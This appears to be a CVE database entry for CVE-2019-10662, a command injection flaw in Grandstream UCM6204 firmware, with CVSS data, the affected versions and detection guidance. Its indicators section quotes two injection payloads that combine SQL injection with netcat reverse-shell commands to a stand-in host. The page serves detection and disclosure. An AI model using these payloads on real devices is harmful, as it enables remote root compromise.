cbcvebase.
CVE-2019-10662
published 2019-03-30

CVE-2019-10662: Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig…

PriorityP272high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
43.76%
98.6th percentile
Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI.

Affected

1 ranges
VendorProductVersion rangeFixed in
grandstreamucm6204_firmware< 1.0.19.201.0.19.20

Detection & IOCsextracted from sources · hover to see the quote

path/cgi?
path/app/asterisk/var/lib/asterisk/scripts/sendMail.py
commandadmin' or 1=1--`;`nc${IFS}192.168.2.107${IFS}1270${IFS}-e${IFS}/bin/sh`;`
command/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
filenamebackupUCMConfig
  • Monitor HTTP requests to the /cgi? URI containing shell metacharacters (backticks, semicolons, ${IFS}) in the backupUCMConfig parameter, indicative of CVE-2019-10662 exploitation attempts.
  • Detect SQL injection payloads combined with shell metacharacters in the username field of the Forgot Password / sendPasswordEmail function, particularly patterns matching `' or 1=1--` followed by backtick-enclosed nc/shell commands.
  • Alert on process execution of sendMail.py invoked via popen/shell with attacker-controlled arguments, especially if followed by nc (netcat) spawning a reverse shell as root.
  • Flag Grandstream UCM62xx devices running firmware versions below 1.0.19.20 as vulnerable to authenticated command injection via CVE-2019-10662.
  • ·The Metasploit module targets the unauthenticated exploitation path (CVE-2020-5722 + command injection) and is scoped to UCM62xx firmware versions before 1.0.19.20; detections should account for both authenticated (CVE-2019-10662, /cgi? endpoint) and unauthenticated (Forgot Password endpoint) attack surfaces.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.